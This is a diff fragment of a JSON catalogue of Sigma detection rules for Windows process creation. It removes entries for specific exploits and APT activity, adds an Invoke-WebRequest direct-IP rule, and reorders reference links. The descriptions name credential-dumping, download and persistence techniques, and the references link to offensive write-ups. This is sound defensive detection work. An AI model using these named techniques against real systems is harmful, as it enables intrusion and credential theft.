"uuid": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09",
"value": "Suspicious SYSTEM User Process Creation"
},
- {
- "description": "Detects new commands that add new printer port which point to suspicious file",
- "meta": {
- "author": "EagleEye Team, Florian Roth",
- "creation_date": "2020/05/13",
- "falsepositive": [
- "New printer port install on host"
- ],
- "filename": "proc_creation_win_exploit_cve_2020_1048.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://windows-internals.com/printdemon-cve-2020-1048/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1048.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.execution",
- "attack.t1059.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "cc08d590-8b90-413a-aff6-31d1a99678d7",
- "value": "Suspicious PrinterPorts Creation (CVE-2020-1048)"
- },
{
"description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection",
"meta": {
@@ -51110,8 +49890,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
"https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/",
+ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml"
],
"tags": [
@@ -51144,8 +49924,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/wdormann/status/1478011052130459653?s=20",
"https://twitter.com/0gtweet/status/1477925112561209344",
+ "https://twitter.com/wdormann/status/1478011052130459653?s=20",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_format.yml"
],
"tags": [
@@ -51168,8 +49948,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866",
"https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/",
+ "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_mpcmdrun_download.yml"
],
"tags": [
@@ -51211,11 +49991,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py",
"https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py",
- "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py",
"https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py",
"https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html",
+ "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py",
+ "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml"
],
"tags": [
@@ -51257,9 +50037,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Regini/",
"https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini",
- "https://lolbas-project.github.io/lolbas/Binaries/Regini/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_execution.yml"
],
"tags": [
@@ -51325,10 +50105,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://isc.sans.edu/diary/22264",
"https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
- "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://isc.sans.edu/diary/22264",
"https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml"
],
"tags": [
@@ -51404,9 +50184,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915",
"https://github.com/electron/rcedit",
"https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe",
- "https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_rcedit_execution.yml"
],
"tags": [
@@ -51464,9 +50244,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files",
- "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE",
"https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps",
+ "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE",
+ "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml"
],
"tags": [
@@ -51534,8 +50314,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_susp_usage.yml"
],
"tags": [
@@ -51555,40 +50335,6 @@
"uuid": "a58353df-af43-4753-bad0-cd83ef35eef5",
"value": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)"
},
- {
- "description": "Detects execution of known compromised version of 3CXDesktopApp",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/03/29",
- "falsepositive": [
- "Legitimate usage of 3CXDesktopApp"
- ],
- "filename": "proc_creation_win_malware_3cx_compromise_execution.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_3cx_compromise_execution.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218",
- "attack.execution"
- ]
- },
- "related": [
- {
- "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "93bbde78-dc86-4e73-9ffc-ff8a384ca89c",
- "value": "Potential Compromised 3CXDesktopApp Execution"
- },
{
"description": "Detects usage of cmdkey to look for cached credentials on the system",
"meta": {
@@ -51687,10 +50433,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://isc.sans.edu/diary/22264",
"https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
- "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://isc.sans.edu/diary/22264",
"https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml"
],
"tags": [
@@ -51830,38 +50576,37 @@
"value": "Suspicious File Download via CertOC.exe"
},
{
- "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group",
+ "description": "Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access",
"meta": {
- "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)",
- "creation_date": "2019/03/04",
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/04/21",
"falsepositive": [
"Unknown"
],
- "filename": "proc_creation_win_apt_slingshot.yml",
+ "filename": "proc_creation_win_powershell_invoke_webrequest_direct_ip.yml",
"level": "medium",
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://securelist.com/apt-slingshot/84312/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml"
+ "https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml"
],
"tags": [
- "attack.persistence",
- "attack.t1053.005",
- "attack.s0111"
+ "attack.command_and_control",
+ "attack.t1105"
]
},
"related": [
{
- "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "related-to"
}
],
- "uuid": "958d81aa-8566-4cea-a565-59ccd4df27b0",
- "value": "Defrag Deactivation"
+ "uuid": "1edff897-9146-48d2-9066-52e8d8f80a2f",
+ "value": "Suspicious Invoke-WebRequest Execution With DirectIP"
},
{
"description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.",
@@ -51876,8 +50621,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md",
"https://attack.mitre.org/software/S0108/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml"
],
"tags": [
@@ -51912,8 +50657,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://isc.sans.edu/diary/22264",
"https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
+ "https://isc.sans.edu/diary/22264",
"https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml"
],
@@ -51990,8 +50735,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://web.archive.org/web/20200329173843/https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation",
"https://www.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation/?edition=2019",
+ "https://web.archive.org/web/20200329173843/https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_setspn_spn_enumeration.yml"
],
"tags": [
@@ -52148,10 +50893,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab",
+ "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd",
"https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0",
"https://twitter.com/nas_bench/status/1537896324837781506",
- "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd",
+ "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml"
],
"tags": [
@@ -52171,62 +50916,6 @@
"uuid": "dc4576d4-7467-424f-9eee-fd2b02855fe0",
"value": "Suspicious Cabinet File Execution Via Msdt.EXE"
},
- {
- "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali",
- "creation_date": "2023/01/21",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/hackerfantastic/status/1616455335203438592?s=20",
- "https://twitter.com/YanZiShuang/status/1616777483646533632?s=20&t=TQT9tUuPbQJai4v6HtsOQw",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_other_win_server_undocumented_rce.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "6d5b8176-d87d-4402-8af4-53aee9db7b5d",
- "value": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE"
- },
- {
- "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2022/02/25",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_hermetic_wiper_activity.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.lateral_movement",
- "attack.t1021.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "2f974656-6d83-4059-bbdf-68ac5403422f",
- "value": "Hermetic Wiper TG Process Patterns"
- },
{
"description": "Detects command line parameters used by Hydra password guessing hack tool",
"meta": {
@@ -52343,8 +51032,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/outflanknl/Dumpert",
"https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/",
+ "https://github.com/outflanknl/Dumpert",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_dumpert.yml"
],
"tags": [
@@ -52377,10 +51066,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/",
"https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7",
+ "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml"
],
"tags": [
@@ -52516,49 +51205,6 @@
"uuid": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b",
"value": "Security Privileges Enumeration Via Whoami.EXE"
},
- {
- "description": "Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2019/02/21",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_apt31_judgement_panda.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_apt31_judgement_panda.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.credential_access",
- "attack.g0128",
- "attack.t1003.001",
- "attack.t1560.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "03e2746e-2b31-42f1-ab7a-eb39365b2422",
- "value": "APT31 Judgement Panda Activity"
- },
{
"description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key",
"meta": {
@@ -52605,9 +51251,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/mattifestation/status/1196390321783025666",
"https://twitter.com/oulusoyum/status/1191329746069655553",
"https://lolbas-project.github.io/lolbas/Binaries/Tttracer/",
+ "https://twitter.com/mattifestation/status/1196390321783025666",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml"
],
"tags": [
@@ -52684,9 +51330,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/",
"https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://lolbas-project.github.io/lolbas/Binaries/Findstr/",
- "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"
],
"tags": [
@@ -52744,9 +51390,9 @@
"logsource.product": "windows",
"refs": [
"https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject",
- "https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
"https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local",
"https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz",
+ "https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml"
],
"tags": "No established tags"
@@ -52767,9 +51413,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/",
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1",
"https://adsecurity.org/?p=2604",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1",
+ "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/",
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml"
],
@@ -52826,8 +51472,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_compress_data.yml"
],
"tags": [
@@ -52910,8 +51556,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100",
"https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100",
+ "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_http_appdata.yml"
],
"tags": [
@@ -52961,8 +51607,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2020/06/21/snatch-ransomware/",
"https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap",
+ "https://thedfirreport.com/2020/06/21/snatch-ransomware/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_ditsnap.yml"
],
"tags": [
@@ -53029,8 +51675,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
"https://www.youtube.com/watch?v=ro2QuZTIMBM",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml"
],
"tags": [
@@ -53053,9 +51699,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/",
"https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
"https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf",
+ "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml"
],
"tags": [
@@ -53188,8 +51834,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.radmin.fr/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md",
+ "https://www.radmin.fr/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_radmin.yml"
],
"tags": [
@@ -53279,47 +51925,6 @@
"uuid": "b3d34dc5-2efd-4ae3-845f-8ec14921f449",
"value": "Browser Started with Remote Debugging"
},
- {
- "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2019/02/21",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_bear_activity_gtr19.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1552.001",
- "attack.t1003.003"
- ]
- },
- "related": [
- {
- "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee",
- "value": "Potential Russian APT Credential Theft Activity"
- },
{
"description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1",
"meta": {
@@ -53333,8 +51938,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/0gtweet/status/1474899714290208777?s=12",
"https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace",
+ "https://twitter.com/0gtweet/status/1474899714290208777?s=12",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump.yml"
],
"tags": "No established tags"
@@ -53388,8 +51993,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/blackorbird/status/1140519090961825792",
"https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html",
+ "https://twitter.com/blackorbird/status/1140519090961825792",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml"
],
"tags": [
@@ -53409,59 +52014,6 @@
"uuid": "1cdd9a09-06c9-4769-99ff-626e2b3991b8",
"value": "Suspicious Double Extension File Execution"
},
- {
- "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/03/25",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2020_10189.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
- "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "attack.execution",
- "attack.t1059.001",
- "attack.t1059.003",
- "attack.s0190",
- "cve.2020.10189"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "846b866e-2a57-46ee-8e16-85fa92759be7",
- "value": "Exploited CVE-2020-10189 Zoho ManageEngine"
- },
{
"description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.",
"meta": {
@@ -53475,10 +52027,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf",
"https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20",
- "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf",
"https://lolbas-project.github.io/lolbas/Libraries/Setupapi/",
+ "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf",
+ "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml"
],
"tags": [
@@ -53498,47 +52050,6 @@
"uuid": "285b85b1-a555-4095-8652-a8a4106af63f",
"value": "Suspicious Rundll32 Setupapi.dll Activity"
},
- {
- "description": "Attempts to detect system changes made by Blue Mockingbird",
- "meta": {
- "author": "Trent Liffick (@tliffick)",
- "creation_date": "2020/05/14",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_blue_mockingbird.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_blue_mockingbird.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1112",
- "attack.t1047"
- ]
- },
- "related": [
- {
- "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
